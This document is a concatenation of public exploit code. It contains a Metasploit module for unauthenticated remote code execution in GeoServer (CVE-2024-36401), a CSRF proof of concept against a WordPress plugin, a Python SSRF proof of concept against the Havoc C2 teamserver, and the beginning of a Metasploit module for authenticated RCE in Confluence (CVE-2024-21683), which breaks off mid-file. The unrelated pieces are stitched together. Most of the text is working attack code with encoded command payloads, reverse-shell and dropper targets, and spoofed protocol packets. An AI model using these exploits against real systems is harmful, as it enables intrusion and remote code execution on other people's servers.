##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated RCE in GeoServer (CVE-2024-36401): the WFS GetPropertyValue
# valueReference is evaluated as an XPath expression, so a crafted request body
# reaches java.lang.Runtime. Every attempt is a POST to /geoserver/wfs that the
# server answers with HTTP 400 (see execute_command), which is the log artefact
# behind the IOC_IN_LOGS note below.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Module metadata, targets and options. Note that the TARGETURI description
  # string mentions "OpenMediaVault"; it is a copy-paste leftover, the option is
  # the GeoServer base path (defaults to '/').
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Geoserver unauthenticated Remote Code Execution',
        'Description' => %q{
          GeoServer is an open-source software server written in Java that provides
          the ability to view, edit, and share geospatial data.
          It is designed to be a flexible, efficient solution for distributing geospatial data
          from a variety of sources such as Geographic Information System (GIS) databases,
          web-based data, and personal datasets.
          In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
          multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
          through specially crafted input against a default GeoServer installation due to unsafely
          evaluating property names as XPath expressions.
          An attacker can abuse this by sending a POST request with a malicious xpath expression
          to execute arbitrary commands as root on the system.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
          'jheysel-r7', # MSF module Windows support
          'Steve Ikeoka' # Discovery
        ],
        'References' => [
          ['CVE', '2024-36401'],
          ['URL', 'https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv'],
          ['URL', 'https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401'],
          ['URL', 'https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401']
        ],
        'DisclosureDate' => '2024-07-01',
        # NOTE(review): the module-level platform list has no 'win' entry even
        # though a 'Windows Command' target is declared below - confirm the
        # target-level 'Platform' is sufficient for payload selection.
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
              # Tested with cmd/unix/reverse_bash
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => ['linux'],
              'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
              'Type' => :linux_dropper,
              'Linemax' => 16384,
              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne']
              # Tested with linux/x64/meterpreter_reverse_tcp
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => ['Windows'],
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd
              # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8080,
          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # IOC_IN_LOGS: the WFS POSTs (and the About page / ListStoredQueries GETs
          # made by check) are recorded by the application server.
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/'])
      ]
    )
  end

  # Fetches the Wicket "About GeoServer" page and reads the version from the
  # <span id="version"> element.
  #
  # @return [Rex::Version, nil] the parsed version, or nil when the page is not
  #   reachable, does not contain 'GeoServer Version', or has no version span
  def check_version
    print_status('Trying to detect if target is running a vulnerable version of GeoServer.')
    res = send_request_cgi!({
      'uri' => normalize_uri(target_uri.path, 'geoserver', 'web', 'wicket', 'bookmarkable', 'org.geoserver.web.AboutGeoServerPage'),
      'keep_cookies' => true,
      'method' => 'GET'
    })
    return nil unless res && res.code == 200 && res.body.include?('GeoServer Version')

    html = res.get_html_document
    unless html.blank?
      # html identifier for Geoserver version information: <span id="version">2.23.2</span>
      version = html.css('span[id="version"]')
      return Rex::Version.new(version[0].text) unless version[0].nil?
    end
    nil
  end

  # Asks the WFS endpoint for its stored queries and picks, at random, one of
  # the advertised ReturnFeatureType values that is on the hard-coded allow list
  # (the sample layers shipped with a default install).
  #
  # @return [String, nil] a feature type name such as 'sf:archsites', or nil
  #   when the request fails or none of the advertised types is allow-listed
  def get_valid_featuretype
    allowed_feature_types = ['sf:archsites', 'sf:bugsites', 'sf:restricted', 'sf:roads', 'sf:streams', 'ne:boundary_lines', 'ne:coastlines', 'ne:countries', 'ne:disputed_areas', 'ne:populated_places']
    res = send_request_cgi!({
      'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
      'method' => 'GET',
      'ctype' => 'application/xml',
      'keep_cookies' => true,
      'vars_get' => {
        'request' => 'ListStoredQueries',
        'service' => 'wfs'
      }
    })
    return nil unless res && res.code == 200 && res.body.include?('ListStoredQueriesResponse')

    xml = res.get_xml_document
    unless xml.blank?
      xml.remove_namespaces!
      # get all the FeatureTypes and store them in an array of strings
      retrieved_feature_types = xml.xpath('//ReturnFeatureType')
      # shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer
      # return the feature type if a match is found in the allowed_feature_types array
      retrieved_feature_types.to_a.shuffle.each do |feature_type|
        return feature_type.text if allowed_feature_types.include?(feature_type.text)
      end
    end
    nil
  end

  # Builds the WFS 2.0.0 GetPropertyValue request body whose valueReference
  # carries the command to run.
  #
  # @param cmd [String] the command for the selected target type
  # @return [String] the XML request body
  def create_payload(cmd)
    # get a valid feature type and fail back to a default if not successful
    feature_type = get_valid_featuretype
    feature_type = 'sf:archsites' if feature_type.nil?

    case target['Type']
    # NOTE(review): `:unix_cmd || :linux_dropper` is a single Ruby expression
    # that evaluates to :unix_cmd, so this branch only matches the Unix Command
    # target; the Linux Dropper target falls through with cmd unchanged. The
    # `exploit` method below writes the same intent as `when :unix_cmd, :win_cmd`.
    when :unix_cmd || :linux_dropper
      # create customised b64 encoded payload
      # 'Encoder' => 'cmd/base64' does not work in this particular use case
      cmd_b64 = Base64.strict_encode64(cmd)
      cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
    when :win_cmd
      # This branch reads payload.encoded directly and ignores the cmd argument;
      # the two are the same value for the win_cmd target (see exploit).
      enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))
      cmd = "powershell.exe -e #{enc_cmd}"
    end

    return <<~EOS
      <wfs:GetPropertyValue service='WFS' version='2.0.0'
       xmlns:topp='http://www.openplans.org/topp'
       xmlns:fes='http://www.opengis.net/fes/2.0'
       xmlns:wfs='http://www.opengis.net/wfs/2.0'>
        <wfs:Query typeNames="#{feature_type}"/>
        <wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{cmd}")</wfs:valueReference>
      </wfs:GetPropertyValue>
    EOS
  end

  # Posts the crafted body to /geoserver/wfs. Success is inferred from the
  # server answering HTTP 400 with 'ClassCastException' in the body (the XPath
  # result cannot be cast back to a property value); anything else is reported
  # as PayloadFailed. Also used as the CmdStager callback for the dropper target.
  #
  # @param cmd [String] command to execute
  # @param _opts [Hash] unused, required by the CmdStager callback signature
  def execute_command(cmd, _opts = {})
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
      'method' => 'POST',
      'ctype' => 'application/xml',
      'keep_cookies' => true,
      'data' => create_payload(cmd)
    })
    fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless res && res.code == 400 && res.body.include?('ClassCastException')
  end

  # Version-based check: Appears for 2.25.0-2.25.1, 2.24.0-2.24.3 and anything
  # below 2.23.6; Unknown when no version could be read; Safe otherwise.
  # NOTE(review): the module description states "< 2.25.1" while this range
  # includes 2.25.1 - confirm the fixed 2.25.x release against the advisory.
  def check
    version_number = check_version
    return CheckCode::Unknown('Could not retrieve the version information.') if version_number.nil?
    return CheckCode::Appears("Version #{version_number}") if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')

    CheckCode::Safe("Version #{version_number}")
  end

  # Dispatches on the target type: command targets send payload.encoded in a
  # single request, the dropper target goes through the CmdStager with the
  # 'Linemax' declared on the target.
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd, :win_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # don't check the response here since the server won't respond
      # if the payload is successfully executed.
      execute_cmdstager({ linemax: target.opts['Linemax'] })
    end
  end
end
<pre><code># Exploit Title: pz-frontend-manager <= 1.0.5 - CSRF change user profile<br />picture<br /># Date: 2024-07-01<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/<br /># Version: <= 1.0.5<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />The plugin does not have CSRF checks in some places, which could allow<br />attackers to make logged in users perform unwanted actions via CSRF attacks.<br /><br />Proof of concept:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost:10003<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)<br />Gecko/20100101 Firefox/124.0<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 1093<br />Origin: http://localhost:10003<br />Sec-GPC: 1<br />Connection: close<br />Cookie: Cookie<br /><br />action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2Jj
Mjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1<br /><br /><br />CSRF Exploit:<br /><br /><html><br /> <body><br /> <form action="http://localhost:10003/wp-admin/admin-ajax.php"<br />method="POST"><br /> <input type="hidden" name="action" value="pzfm_upload_avatar" /><br /> <input type="hidden" name="imageData"<br />value="data:image/png;base64,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"<br />/><br /> <input type="hidden" name="userID" value="1"" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> <script><br /> history.pushState('', '', '/');<br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /><br />Profile picture of user 1 will be changed in the dashboard<br />http://localhost:10003/dashboard/?dashboard=profile<br /><br />Reference:<br />https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/<br /></code></pre>
# Exploit Title: Havoc C2 0.7 Unauthenticated SSRF
# Date: 2024-07-13
# Exploit Author: @_chebuya
# Software Link: https://github.com/HavocFramework/Havoc
# Version: v0.7
# Tested on: Ubuntu 20.04 LTS
# CVE: ?
# Description: This exploit works by spoofing a demon agent registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more.
# Github: https://github.com/chebuya/Havoc-C2-SSRF-poc
# Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/
#
# Structure of every request sent below (see the agent_header assignments):
#   4-byte big-endian total size | 4-byte magic 0xDEADBEEF | 4-byte agent_id | body
# The registration packet carries the client-chosen AES key and IV in clear,
# and this script uses all-zero values for both; the listener accepting such a
# registration without any prior trust is what the PoC relies on. From a
# defender's view, agent registrations whose key/IV material is all zeros and
# agents that open sockets immediately after registering are the observable
# artefacts of this activity.
import binascii
import random
import requests
import argparse
import urllib3
urllib3.disable_warnings()


from Crypto.Cipher import AES
from Crypto.Util import Counter

# AES-256 key length; shorter keys are right-padded in encrypt()/decrypt().
key_bytes = 32

def decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """AES-CTR decrypt ciphertext; key is right-padded to 32 bytes, iv seeds the counter.

    Padding uses the ASCII byte b"0" (0x30), not NUL, so a short key is
    extended with '0' characters.
    """
    if len(key) <= key_bytes:
        for _ in range(len(key), key_bytes):
            key += b"0"

    assert len(key) == key_bytes

    # The 16-byte IV is used as the initial 128-bit counter value.
    iv_int = int(binascii.hexlify(iv), 16)
    ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
    aes = AES.new(key, AES.MODE_CTR, counter=ctr)

    plaintext = aes.decrypt(ciphertext)
    return plaintext


def int_to_bytes(value: int, length: int = 4, byteorder: str = "big") -> bytes:
    """Serialise an int as fixed-width bytes (default: 4 bytes, big-endian)."""
    return value.to_bytes(length, byteorder)


def encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """AES-CTR encrypt plaintext; same key padding and counter setup as decrypt()."""

    if len(key) <= key_bytes:
        for x in range(len(key),key_bytes):
            key = key + b"0"

    assert len(key) == key_bytes

    iv_int = int(binascii.hexlify(iv), 16)
    ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
    aes = AES.new(key, AES.MODE_CTR, counter=ctr)

    ciphertext = aes.encrypt(plaintext)
    return ciphertext

def register_agent(hostname: bytes, username: bytes, domain_name: bytes, internal_ip: bytes, process_name: bytes, process_id: bytes) -> None:
    """Send a spoofed DEMON_INITIALIZE packet so the listener records a new agent.

    Uses the module-level agent_id, AES_Key, AES_IV, magic, headers and
    teamserver_listener_url. Only prints the outcome; the HTTP response body
    is not parsed.
    """
    # DEMON_INITIALIZE / 99
    command = b"\x00\x00\x00\x63"
    request_id = b"\x00\x00\x00\x01"
    demon_id = agent_id

    hostname_length = int_to_bytes(len(hostname))
    username_length = int_to_bytes(len(username))
    domain_name_length = int_to_bytes(len(domain_name))
    internal_ip_length = int_to_bytes(len(internal_ip))
    # NOTE(review): the length sent for process_name is 6 less than its real
    # size (process_name is UTF-16LE encoded at the call site) - reason not
    # visible here; presumably matches how the agent reports it. Verify.
    process_name_length = int_to_bytes(len(process_name) - 6)

    # Filler bytes appended after the fixed fields.
    data = b"\xab" * 100

    # Key and IV travel in the clear inside the registration body.
    header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data

    # 12 = size field + magic + agent_id.
    size = 12 + len(header_data)
    size_bytes = size.to_bytes(4, 'big')
    agent_header = size_bytes + magic + agent_id

    print("[***] Trying to register agent...")
    # verify=False: TLS certificate validation is disabled for the listener.
    r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[***] Success!")
    else:
        print(f"[!!!] Failed to register agent - {r.status_code} {r.text}")


def open_socket(socket_id: bytes, target_address: str, target_port: int) -> None:
    """Send an encrypted COMMAND_SOCKET / SOCKET_COMMAND_OPEN so the teamserver connects to target_address:target_port.

    This is the SSRF primitive: the TCP connection originates from the
    teamserver, not from this script.
    """
    # COMMAND_SOCKET / 2540
    command = b"\x00\x00\x09\xec"
    request_id = b"\x00\x00\x00\x02"

    # SOCKET_COMMAND_OPEN / 16
    subcommand = b"\x00\x00\x00\x10"
    # Not included in the package below.
    sub_request_id = b"\x00\x00\x00\x03"

    # Placeholder local endpoint values; the server does not appear to use them here.
    local_addr = b"\x22\x22\x22\x22"
    local_port = b"\x33\x33\x33\x33"


    # Dotted-quad packed in reversed octet order (last octet first).
    forward_addr = b""
    for octet in target_address.split(".")[::-1]:
        forward_addr += int_to_bytes(int(octet), length=1)

    forward_port = int_to_bytes(target_port)

    package = subcommand+socket_id+local_addr+local_port+forward_addr+forward_port
    package_size = int_to_bytes(len(package) + 4)

    # Only the command/request ids are in the clear; the package is AES-CTR encrypted.
    header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)

    size = 12 + len(header_data)
    size_bytes = size.to_bytes(4, 'big')
    agent_header = size_bytes + magic + agent_id
    data = agent_header + header_data


    print("[***] Trying to open socket on the teamserver...")
    r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[***] Success!")
    else:
        print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}")


def write_socket(socket_id: bytes, data: bytes) -> None:
    """Send data to be written on the previously opened socket (encrypted package)."""
    # COMMAND_SOCKET / 2540
    command = b"\x00\x00\x09\xec"
    request_id = b"\x00\x00\x00\x08"

    # SOCKET_COMMAND_READ / 11  (value is 0x11)
    subcommand = b"\x00\x00\x00\x11"
    # Not included in the package below.
    sub_request_id = b"\x00\x00\x00\xa1"

    # SOCKET_TYPE_CLIENT / 3
    socket_type = b"\x00\x00\x00\x03"
    success = b"\x00\x00\x00\x01"

    data_length = int_to_bytes(len(data))

    package = subcommand+socket_id+socket_type+success+data_length+data
    package_size = int_to_bytes(len(package) + 4)

    header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)

    size = 12 + len(header_data)
    size_bytes = size.to_bytes(4, 'big')
    agent_header = size_bytes + magic + agent_id
    post_data = agent_header + header_data

    print("[***] Trying to write to the socket")
    r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[***] Success!")
    else:
        print(f"[!!!] Failed to write data to the socket - {r.status_code} {r.text}")


def read_socket(socket_id: bytes) -> bytes | str:
    """Poll the teamserver (COMMAND_GET_JOB) and return the decrypted job payload minus a 12-byte prefix.

    Returns "" (a str, not bytes) on a non-200 response; the call site does
    .decode() on the result, which would raise AttributeError in that case.
    socket_id is accepted but not used.
    """
    # COMMAND_GET_JOB / 1
    command = b"\x00\x00\x00\x01"
    request_id = b"\x00\x00\x00\x09"

    header_data = command + request_id

    size = 12 + len(header_data)
    size_bytes = size.to_bytes(4, 'big')
    agent_header = size_bytes + magic + agent_id
    data = agent_header + header_data


    print("[***] Trying to poll teamserver for socket output...")
    r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[***] Read socket output successfully!")
    else:
        print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}")
        return ""


    # Response header fields are little-endian, unlike the big-endian request
    # framing above. These three values are parsed but not used.
    command_id = int.from_bytes(r.content[0:4], "little")
    request_id = int.from_bytes(r.content[4:8], "little")
    package_size = int.from_bytes(r.content[8:12], "little")
    enc_package = r.content[12:]

    return decrypt(AES_Key, AES_IV, enc_package)[12:]



parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)
parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)
parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)
# NOTE(review): the help text for -A/--user-agent is a copy-paste leftover; the option sets the User-Agent header.
parser.add_argument("-A", "--user-agent", help="The URL for a havoc listener", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")
parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")
parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")
parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")
parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")

args = parser.parse_args()


# 0xDEADBEEF
magic = b"\xde\xad\xbe\xef"
teamserver_listener_url = args.target
headers = {
    "User-Agent": args.user_agent
}
# Random 4-byte agent id, fixed for the whole run (all packets reuse it).
agent_id = int_to_bytes(random.randint(100000, 1000000))
# All-zero key/IV; sent to the listener in register_agent() and reused for
# every encrypted package afterwards.
AES_Key = b"\x00" * 32
AES_IV = b"\x00" * 16
hostname = bytes(args.hostname, encoding="utf-8")
username = bytes(args.username, encoding="utf-8")
domain_name = bytes(args.domain_name, encoding="utf-8")
internal_ip = bytes(args.internal_ip, encoding="utf-8")
# Process name is the one UTF-16LE field; see the length adjustment in register_agent().
process_name = args.process_name.encode("utf-16le")
process_id = int_to_bytes(random.randint(1000, 5000))

register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)

socket_id = b"\x11\x11\x11\x11"
open_socket(socket_id, args.ip, int(args.port))

request_data = b"GET /vulnerable HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n"
write_socket(socket_id, request_data)
print(read_socket(socket_id).decode())
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Authenticated (administrator) RCE in Confluence via the Code Macro "add
# language" upload (CVE-2024-21683). Request flow, in order: dologin.action ->
# admin/console.action -> optional doauthenticate.action (secure admin
# session) -> admin/systeminfo.action -> admin/plugins/newcode/configure.action
# -> admin/plugins/newcode/addlanguage.action. All of these appear in the
# access log (IOC_IN_LOGS); the last one with a multipart body is the
# execution trigger.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version

  # Module metadata and options. ADMIN_USER / ADMIN_PASS must belong to a
  # Confluence administrator; exploit fails with BadConfig otherwise.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Atlassian Confluence Administrator Code Macro Remote Code Execution',
        'Description' => %q{
          This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence,
          tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating
          tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will
          authenticate, validate user privileges, extract the underlying host OS information, then trigger
          remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions
          up to 8.9.0.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ankita Sawlani', # Discovery
          'Huong Kieu', # Public Analysis
          'W01fh4cker', # PoC Exploit
          'remmons-r7' # MSF Exploit
        ],
        'References' => [
          ['CVE', '2024-21683'],
          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'],
          ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'],
          ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE']
        ],
        'DisclosureDate' => '2024-05-21',
        'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default.
        'Platform' => ['unix', 'linux', 'win'],
        'Arch' => [ARCH_CMD],
        'DefaultTarget' => 0,
        'Targets' => [ [ 'Default', {} ] ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # The access log files will contain requests to the exploitable administrator dashboard endpoints.
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        # By default, Confluence serves an HTTP service on TCP port 8090.
        Opt::RPORT(8090),
        OptString.new('TARGETURI', [true, 'The URI path to Confluence', '/']),
        OptString.new('ADMIN_USER', [true, 'The Confluence administrator username', '']),
        OptString.new('ADMIN_PASS', [true, 'The Confluence administrator password', ''])
      ]
    )
  end

  # Version-only check (no authentication). Appears when the version read from
  # the login page falls in one of the listed ranges, Safe otherwise, Unknown
  # when the version cannot be determined.
  def check
    # Begin by retrieving the version string from the login page.
    version = get_confluence_version
    return CheckCode::Unknown('Failed to determine the Confluence version') unless version

    # Check the extracted version against all documented vulnerable versions.
    if version == Rex::Version.new('8.9.0') ||
       version.between?(Rex::Version.new('8.8.0'), Rex::Version.new('8.8.1')) ||
       version.between?(Rex::Version.new('8.7.0'), Rex::Version.new('8.7.2')) ||
       version.between?(Rex::Version.new('8.6.0'), Rex::Version.new('8.6.2')) ||
       version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.8')) ||
       version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.5')) ||
       version.between?(Rex::Version.new('8.3.0'), Rex::Version.new('8.3.4')) ||
       version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.3')) ||
       version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.4')) ||
       version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.4')) ||
       version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('7.20.3')) ||
       version.between?(Rex::Version.new('7.19.0'), Rex::Version.new('7.19.21')) ||
       version.between?(Rex::Version.new('7.18.0'), Rex::Version.new('7.18.3')) ||
       version.between?(Rex::Version.new('7.17.0'), Rex::Version.new('7.17.5')) ||
       # According to Atlassian, all versions < 7.17 are vulnerable.
       version.between?(Rex::Version.new('0.0.0'), Rex::Version.new('7.16.999'))
      Exploit::CheckCode::Appears("Exploitable version of Confluence: #{version}")
    else
      Exploit::CheckCode::Safe("Non-exploitable version of Confluence: #{version}")
    end
  end

  # POSTs the credentials to dologin.action with cookies kept on the client.
  # The caller checks for a 302 whose Location contains the 'XsuccessX'
  # marker passed as os_destination.
  #
  # @param username [String]
  # @param password [String]
  # @return [Rex::Proto::Http::Response, nil] the raw response (nil on connection failure)
  def login(username, password)
    # Perform a POST request to login to Confluence with the provided credentials.
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'dologin.action'),
      'keep_cookies' => 'true',
      'vars_post' => {
        'os_username' => username,
        'os_password' => password,
        'os_destination' => '%2FXsuccessX'
      }
    )
  end

  # Re-enters the admin password on doauthenticate.action ("Secure
  # Administrator Sessions"). Raises via fail_with on no response or when the
  # reply is not a 302 to the 'XsuccessX' destination.
  # NOTE(review): res_elevate.headers['Location'] is called with .include?
  # without a nil guard; a 302 without a Location header would raise
  # NoMethodError rather than the intended UnexpectedReply.
  def elevate
    # Elevates the current administrator session. By default, administrator sessions will remain elevated for two minutes after this takes place.
    vprint_status('Secure Administrator Sessions enabled - elevating session')

    # Grab a CSRF token from the elevation page form.
    csrf_elevation = get_csrf('doauthenticate.action', 'elevation')

    # With the valid elevation token, escalate the current administrator session.
    res_elevate = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'doauthenticate.action'),
      'keep_cookies' => 'true',
      'vars_post' => {
        'atl_token' => csrf_elevation,
        'password' => datastore['ADMIN_PASS'],
        'authenticate' => 'Confirm',
        'destination' => '%2FXsuccessX'
      }
    )

    # Connection failure, no response, or malformed response.
    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege elevation') unless res_elevate

    # Confirm that the response indicates a successful elevation.
    fail_with(Failure::UnexpectedReply, 'The session elevation appears to have failed') unless res_elevate.code == 302 && res_elevate.headers['Location'].include?('XsuccessX')

    vprint_status('Administrator session has been elevated')
  end

  # GETs `page` and extracts the atl_token hidden input.
  #
  # @param page [String] path relative to TARGETURI
  # @param operation [String] label used only in log/error messages
  # @return [String] the 40-character token; fail_with on any other outcome
  def get_csrf(page, operation)
    # Perform a GET request to the target page to grab a CSRF token.
    res_get_csrf = send_request_cgi(
      'method' => 'GET',
      'keep_cookies' => 'true',
      'uri' => normalize_uri(target_uri.path, page)
    )

    # Connection failure, no response, or malformed response.
    fail_with(Failure::Unknown, "Target did not respond as expected when fetching #{operation} CSRF token") unless res_get_csrf

    # If the response is not 200 and does not contain the string "atl_token", the target page has behaved unexpectedly.
    fail_with(Failure::UnexpectedReply, "Target returned a response that did not contain #{operation} CSRF token") unless res_get_csrf.code == 200 && res_get_csrf.body.include?('atl_token')

    # Response page should contain '<input type="hidden" name="atl_token" value="tokenhere">'.
    # `.values[2]` is positional: it assumes the attribute order type, name, value
    # shown above. A page that orders attributes differently yields the wrong
    # attribute and trips the length check below.
    csrf_token = res_get_csrf.get_xml_document.xpath('//input[@name="atl_token"]').first&.values&.[](2)

    # Token should be 40 characters.
    fail_with(Failure::UnexpectedReply, "Target did not return the expected 40-character #{operation} CSRF token") unless csrf_token&.length == 40

    vprint_status("Grabbed #{operation} CSRF token: #{csrf_token}")

    csrf_token
  end

  # Reads the operating.system span from admin/systeminfo.action.
  #
